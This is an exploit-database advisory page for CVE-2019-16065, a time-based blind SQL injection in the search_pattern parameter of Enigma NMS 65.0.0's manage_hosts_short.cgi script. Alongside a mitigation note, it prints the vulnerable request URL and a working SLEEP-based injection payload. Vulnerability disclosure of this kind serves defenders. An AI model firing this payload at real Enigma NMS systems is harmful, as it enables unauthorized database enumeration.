header-logo
Suggest Exploit
vendor:
Enigma NMS
by:
Mark Cross
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Enigma NMS
Affected Version From: Enigma NMS 65.0.0
Affected Version To: Enigma NMS 65.0.0
Patch Exists: YES
Related CWE: CVE-2019-16065
CPE: a:netsas:enigma_nms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Enigma NMS search_pattern SQL Injection

Enigma NMS is vulnerable to a SQL injection vulnerability in the search_pattern parameter of the manage_hosts_short.cgi script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious payload to the vulnerable script. This payload will cause the server to pause for a specified amount of time, allowing the attacker to enumerate the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS search_pattern SQL Injection             #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16065                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/        -= Enigma SQLi by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    

Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
Vulnerable Parameter:  search_pattern (GET)
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

Navigation

Suggest Exploit

Services By CQR